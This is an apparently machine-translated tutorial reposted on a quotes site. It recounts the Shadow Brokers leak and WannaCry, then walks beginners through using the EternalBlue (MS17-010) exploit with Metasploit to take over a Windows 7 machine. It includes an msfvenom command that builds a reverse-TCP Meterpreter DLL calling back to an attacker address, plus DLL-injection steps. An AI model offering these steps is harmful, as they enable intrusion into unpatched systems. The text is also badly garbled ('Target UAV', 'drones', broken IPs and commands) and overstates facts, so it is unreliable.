Current location - Quotes Website - Collection of slogans - Ms 17-0 10: Capture a computer with "Eternal Blue"
Ms 17-0 10: Capture a computer with "Eternal Blue"
I estimate that everyone should have been blown out of the circle of friends by an old ransomware these two days, and some students may have been unfortunately recruited. So what caused this ransomware to be so rampant?

This matter has to start with a hacker organization called Equation Group, which has always been closely related to the National Security Agency (NSA). Moreover, it is generally believed that the equations are subordinate departments of the National Security Agency. Many security research experts say that the technology owned by the hacker organization Equation Group has surpassed most hacker organizations in complexity and advanced degree, and the hacker organization has been active for more than 20 years.

However, this hacker organization was invaded by another hacker organization "Shadow Brokers" ... (it is so capricious). The "shadow brokers" claimed that they obtained a large part of hacking tools from Formula Group and decided to sell them publicly.

I thought I could make a fortune, but in fact no one cares about them. It's amazing. So the shadow broker decided to disclose some valuable tools, and "Eternal Blue" was one of them (vulnerability number ms 17-0 10). So how far is the exploit program of Eternal Blue? Let's put it this way, except windows 10, all windows series systems are spared.

As a result, Eternal Blue exploit program +wannacry ransomware program has created the largest blackmail payment activity so far, affecting thousands of enterprises and public organizations in nearly 100 countries.

Next, in order to satisfy Xiaobai's curiosity, let's discuss how to use ms 17-0 10 to capture a 64-bit windows 7, the eternal blue vulnerability exploitation program released by the shadow broker.

Attack aircraft1(192.168.1.1kloc-0/);

Linux with metasploit

Attacker 2 (192.168.1.137):

Windows XP-> python 2.6+pywin32 v2.12 that can run the shadow broker toolbox.

Target UAV (192.168.1.140):

Windows 7 x64 (open ports 139 and 445)

Use the eternal blue in the shadow broker toolbox to capture drones with programs.

The modified path is consistent with the current path of the directory.

Enter until you enter the project name, and then enter the project name.

Continue into the car.

Continue to input all the way until the mode is 1.

Continue to enter all the way until the attack is completed.

Related commands:

MSF venom-p windows/x64/meter preter/reverse _ TCP-a x64 lhost = 192. 168. 1. 10 1 lport = 4444-f dll-o ./back door . dll

Input all the way until the system architecture is selected. Since the host we want to attack is win 7 x64 bit, we choose 1 here.

Select 2 dll injection

Ps: leave a like b (▽) d ~ If you like, you can also pay attention to the topic: hacker.

Related articles
  • After-school dance slogan
  • What internationally renowned non-joint-stock enterprises are there?
  • How was the earliest computer algorithm worked out?
  • Putonghua slogan jingle
  • What kind of car lamp is Xinya r9?
  • Slogan of a good start in 2024
  • The Historical Evolution of Chongqing Niu Qian Construction Engineering Co., Ltd.
  • What is the complete slogan of Poké mon Rocket?
  • What is the economic development of Handan in recent years?
  • What does the legend of giants mainly talk about?

    • copyright 2024 Quotes Website All rights reserved